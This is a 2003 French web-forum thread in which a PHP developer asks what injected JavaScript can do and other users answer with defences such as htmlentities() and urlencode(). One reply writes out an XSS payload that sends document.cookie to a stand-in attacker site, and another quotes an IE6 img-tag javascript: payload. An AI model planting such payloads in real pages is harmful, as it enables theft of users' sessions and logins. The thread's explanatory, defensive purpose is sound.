sécurité javascript

sécurité javascript - HTML/CSS - Programmation

Marsh Posté le 23-03-2003 à 17:46:54    

je programme en php et je voulais savoir ce qui etait dangereux comme javascript au cas ou quelqu'un arrive a inserer du javascript dans ma page ?


Message édité par forummp3 le 23-03-2003 à 17:47:12
Reply

Marsh Posté le 23-03-2003 à 17:46:54   

Reply

Marsh Posté le 23-03-2003 à 17:52:15    

Cross site scripting (XSS) :
 
<script>document.location='http://www.lesiteduhacker.com/cookie.cgi? '%20+document.cookie</script>
 
permet d'envoyer sur le site du vilain les cookies utilisé pour ton site, le plus interressant étant évidemment login et mots de passe, identifiant de session.
 
Sinon, une connerier du genre :  
window.open (document.location)
 
Toujours pénible
 
FAQ XSS : http://www.cgisecurity.com/articles/xss-faq.shtml


Message édité par kadreg le 23-03-2003 à 17:52:48

---------------
brisez les rêves des gens, il en restera toujours quelque chose...  -- laissez moi troller sur discu !
Reply

Marsh Posté le 23-03-2003 à 18:08:25    

kadreg a écrit :

Cross site scripting (XSS) :
 
<script>document.location='http://www.lesiteduhacker.com/cookie.cgi? '%20+document.cookie</script>
 
permet d'envoyer sur le site du vilain les cookies utilisé pour ton site, le plus interressant étant évidemment login et mots de passe, identifiant de session.
 
Sinon, une connerier du genre :  
window.open (document.location)
 
Toujours pénible
 
FAQ XSS : http://www.cgisecurity.com/articles/xss-faq.shtml

c si puissant que ca  :ouch:  
 
on serait dans la merde si ca arrivait avec le forum de joce :D

Reply

Marsh Posté le 23-03-2003 à 18:12:28    

forummp3 a écrit :

c si puissant que ca  :ouch:  
 
on serait dans la merde si ca arrivait avec le forum de joce :D


oui mais bon, si tu fais un minimum attention ben t'as pas ce genre de failles :D


Message édité par Suri le 23-03-2003 à 18:12:42
Reply

Marsh Posté le 23-03-2003 à 18:26:00    

Suri a écrit :


oui mais bon, si tu fais un minimum attention ben t'as pas ce genre de failles :D

tu sais l'erreur est humaine :D

Reply

Marsh Posté le 23-03-2003 à 18:48:13    

sinon ya que ca comme faille ? :??:

Reply

Marsh Posté le 23-03-2003 à 19:12:01    

un commentaire dans la doc de php.net
 

Citation :


Keep in mind that there's a bug in IE 6 that let's people insert JS into <IMG> SRC tag.
 
<img src="javascript:alert('Hello world';)" />
 
Something like that.
 
Don't allow <img>!!!

Reply

Marsh Posté le 23-03-2003 à 19:47:08    

forummp3 a écrit :

sinon ya que ca comme faille ? :??:


faille d'include
faille de post/get  
etc.. un coup de google tu trouveras ton bonheur :d

Reply

Marsh Posté le 23-03-2003 à 19:49:16    

Suri a écrit :


faille d'include
faille de post/get  
etc.. un coup de google tu trouveras ton bonheur :d

je parlais de faille javascript,a part le script pour recuper le cookies,ya rien d'autre ?

Reply

Marsh Posté le 23-03-2003 à 20:59:49    

forummp3 a écrit :

je parlais de faille javascript,a part le script pour recuper le cookies,ya rien d'autre ?

ben tout ce que peux faire un script... ya pas non plus que le javascript... si t sous win t'as le vbscript (language de bcp de virus :ange: ) qui peut etre bien plus mechant...


---------------
Suri.morkitu.org : Balades au coeur de la ville...
Reply

Marsh Posté le 23-03-2003 à 20:59:49   

Reply

Marsh Posté le 23-03-2003 à 21:55:55    

Suri a écrit :

ben tout ce que peux faire un script... ya pas non plus que le javascript... si t sous win t'as le vbscript (language de bcp de virus :ange: ) qui peut etre bien plus mechant...

[:totoz]
 
bon ben je vais verifier tout ca :D

Reply

Marsh Posté le 23-03-2003 à 22:49:03    

forummp3 a écrit :

[:totoz]
 
bon ben je vais verifier tout ca :D


suffit de desactiver le html ds toutes les entrees utilisateur...


---------------
Suri.morkitu.org : Balades au coeur de la ville...
Reply

Marsh Posté le 23-03-2003 à 22:59:27    

Non, suffit de correctement quoter tout ce qui est du texte.
 
En PHP, htmlentities() et urlencode() font ça très bien.

Reply

Marsh Posté le 23-03-2003 à 23:10:46    

axey a écrit :

Non, suffit de correctement quoter tout ce qui est du texte.
 
En PHP, htmlentities() et urlencode() font ça très bien.
 


 
oui donc c ce que j'ai dis en gros hein :D


---------------
Suri.morkitu.org : Balades au coeur de la ville...
Reply

Marsh Posté le 24-03-2003 à 09:10:00    

Non, tu as dit qu'il fallait "desactiver le html".
 
Pour moi ca veut dire que tu retires tout ce qui ressemble à une balise (genre si le mec veut poster <script language="text/vbscript"> il peut pas car c'est viré au lieu d'etre affiché. Il y a des forums qui font ça) .

Reply

Marsh Posté le 24-03-2003 à 10:16:44    

axey a écrit :

Non, tu as dit qu'il fallait "desactiver le html".
 
Pour moi ca veut dire que tu retires tout ce qui ressemble à une balise (genre si le mec veut poster <script language="text/vbscript"> il peut pas car c'est viré au lieu d'etre affiché. Il y a des forums qui font ça) .
 


mouais, enfin je pensais a htmlentities() :D


---------------
Suri.morkitu.org : Balades au coeur de la ville...
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed